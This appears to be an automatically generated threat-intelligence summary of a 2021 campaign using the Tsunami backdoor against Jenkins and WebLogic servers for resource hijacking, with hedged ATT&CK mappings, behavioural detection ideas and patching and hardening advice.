Full Report
On 2021-10-26, a campaign was reported, involving an unknown actor, gaining initial access via Software misconfig, 1-day vulnerability, targeting Jenkins, WebLogic to achieve Resource hijacking. The following tools were observed: Tsunami.
Analysis Summary
# Tool/Technique: Tsunami
## Overview
Tsunami is a backdoor malware observed being used in a campaign targeting Jenkins and WebLogic servers, ultimately leading to resource hijacking.
## Technical Details
- Type: Malware family
- Platform: Likely Linux/Unix-based systems hosting Jenkins and WebLogic (as these are the targeted applications).
- Capabilities: Backdoor functionality, likely geared towards establishing persistence and facilitating resource hijacking (e.g., cryptomining or botnet enrollment).
- First Seen: Used in a campaign reported on 2021-10-26.
## MITRE ATT&CK Mapping
Due to the limited information on Tsunami's full execution chain, the mappings focus on the observed impact and access vector:
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (Inferred if the "1-day vulnerability" was exploited)
- **TA0011 - Command and Control** (Implied by being a backdoor)
- T1071 - Application Layer Protocol (Likely used for C2)
- **TA0010 - Impact**
- T1496 - Resource Hijacking (Observed Impact)
## Functionality
### Core Capabilities
- Establishing persistence on compromised web application servers (Jenkins, WebLogic).
- Exploiting observed vulnerabilities or misconfigurations for initial compromise.
- Executing commands to facilitate resource hijacking.
### Advanced Features
The specific advanced features of the Tsunami variant used in this context are not detailed, but its goal was resource hijacking, suggesting capabilities related to crypto-mining software installation or establishing a botnet agent.
## Indicators of Compromise
- File Hashes: N/A (Not provided in the context)
- File Names: N/A (Not provided in the context)
- Registry Keys: N/A (Not applicable or provided)
- Network Indicators: N/A (Not provided in the context. All network indicators should be defanged.)
- Behavioral Indicators: Observation of processes attempting to consume excessive resources (CPU/GPU) consistent with crypto-mining, or unexplained outbound network traffic initiated by the Jenkins/WebLogic user context.
## Associated Threat Actors
- ❓Unknown actor (Reported on 2021-10-26)
## Detection Methods
- Signature-based detection: Signature matching on known Tsunami binaries (if hashes become available).
- Behavioral detection: Monitoring Java processes (like those running Jenkins/WebLogic) for spawning unexpected shell processes or downloading secondary payloads.
- YARA rules: N/A (Not provided in the context)
## Mitigation Strategies
- **Prevention Measures:** Immediately patch or remediate the "1-day vulnerability" affecting Jenkins/WebLogic infrastructure.
- **Hardening Recommendations:** Review and lockdown software configurations for critical servers like Jenkins and WebLogic, enforcing the principle of least privilege for application service accounts. Restrict outbound network access from these application servers where possible.
## Related Tools/Techniques
- This activity utilizes techniques common in post-exploitation associated with cryptomining operations. Tsunami itself is a known backdoor, often associated with botnet activities.